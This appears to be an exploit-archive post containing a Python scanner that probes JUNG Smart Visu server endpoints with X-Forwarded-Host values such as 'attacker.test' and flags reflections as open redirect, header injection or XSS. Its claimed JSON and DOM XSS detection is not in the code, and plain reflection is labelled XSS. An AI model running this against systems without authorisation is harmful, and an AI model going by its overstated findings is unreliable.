============================================================================================================================================= | # Title : Advanced JUNG Smart Visu Security Scanner | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://www.jung-group.com | ============================================================================================================================================= [+] Summary : A multithreaded security scanner for JUNG Smart Visu servers that detects reflected XSS, header injection, open redirects, and JSON injection. It tests predefined endpoints with custom payloads, analyzes HTTP responses for vulnerabilities, and generates a detailed report of findings for authorized security testing purposes only. [+] POC : #!/usr/bin/env python3 import requests import threading import queue import time import re import json import urllib.parse import warnings from colorama import init, Fore, Style from typing import Dict, List, Optional from dataclasses import dataclass from enum import Enum warnings.filterwarnings("ignore", message="Unverified HTTPS request") init(autoreset=True) class VulnerabilityType(Enum): XSS_REFLECTED = "Reflected XSS" XSS_DOM_BASED = "DOM-based XSS" OPEN_REDIRECT = "Open Redirect" HEADER_INJECTION = "Header Injection" JSON_INJECTION = "JSON Injection" @dataclass class Finding: endpoint: str vuln_type: VulnerabilityType payload: str context: str severity: str evidence: str exploitation_steps: List[str] remediation: str class AdvancedJUNGScanner: def __init__(self, target: str, threads: int = 5, timeout: int = 5): self.target = target.rstrip('/') self.threads = threads self.timeout = timeout self.findings = [] self.lock = threading.Lock() self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Security Research)' }) self.endpoints = self.load_endpoints() self.payloads = self.load_payloads() def load_endpoints(self) -> List[str]: return [ "/rest/items", "/rest/status", "/api/v1/status", "/jsonrpc", "/ui/dashboard", "/index.html", "/debug", "/console" ] def load_payloads(self) -> List[str]: return [ "attacker.test", "evil.local", f"x{int(time.time())}.local" ] def analyze_response(self, response: requests.Response, payload: str, endpoint: str) -> Optional[Finding]: location = response.headers.get("Location", "") if payload in location: return Finding( endpoint, VulnerabilityType.OPEN_REDIRECT, payload, "Location Header", "HIGH", f"Location: {location}", ["Value reflected inside Location header"], "Do not use user input in redirection" ) cookie = response.headers.get("Set-Cookie", "") if payload in cookie: return Finding( endpoint, VulnerabilityType.HEADER_INJECTION, payload, "Set-Cookie", "MEDIUM", f"Set-Cookie: {cookie}", ["Value reflected inside cookie"], "Filter input and enable HttpOnly flag" ) if payload in response.text: return Finding( endpoint, VulnerabilityType.XSS_REFLECTED, payload, "Body Reflection", "MEDIUM", "Payload reflected in response body", ["Direct reflection of the value"], "Filter and encode inputs" ) return None def worker(self, work_queue: queue.Queue): while True: try: endpoint, payload = work_queue.get(timeout=1) url = f"{self.target}{endpoint}" headers = { "X-Forwarded-Host": payload } try: response = self.session.get( url, headers=headers, timeout=self.timeout, verify=False, allow_redirects=False ) finding = self.analyze_response(response, payload, endpoint) if finding: with self.lock: self.findings.append(finding) print(f"{Fore.RED}[DISCOVERY]{Style.RESET_ALL} {endpoint}") except Exception: pass work_queue.task_done() except queue.Empty: break def scan(self) -> List[Finding]: print(f"\n{Fore.CYAN}{'='*60}") print(" JUNG Smart Visu Scanner - Stable Version ") print(f"{'='*60}{Style.RESET_ALL}") print(f"Target: {self.target}") print(f"Number of Endpoints: {len(self.endpoints)}") print(f"{'='*60}\n") work_queue = queue.Queue() for endpoint in self.endpoints: for payload in self.payloads: work_queue.put((endpoint, payload)) threads = [] for _ in range(self.threads): t = threading.Thread(target=self.worker, args=(work_queue,)) t.start() threads.append(t) for t in threads: t.join() return self.findings def generate_report(findings: List[Finding], target: str) -> str: report = f""" ======================================== Security Scan Report ======================================== Target: {target} Date: {time.strftime('%Y-%m-%d %H:%M:%S')} Total Findings: {len(findings)} """ for i, f in enumerate(findings, 1): report += f""" {i}. {f.vuln_type.value} Path: {f.endpoint} Severity: {f.severity} Evidence: {f.evidence} """ return report def main(): import sys if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} ") sys.exit(1) target = sys.argv[1] scanner = AdvancedJUNGScanner(target) findings = scanner.scan() report = generate_report(findings, target) file_name = f"scan_report_{int(time.time())}.txt" with open(file_name, "w", encoding="utf-8") as f: f.write(report) print(f"\n{Fore.GREEN}Report saved to: {file_name}{Style.RESET_ALL}") if findings: print(f"{Fore.RED}Found {len(findings)} result(s){Style.RESET_ALL}") else: print(f"{Fore.GREEN}No results found{Style.RESET_ALL}") if __name__ == "__main__": main() Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================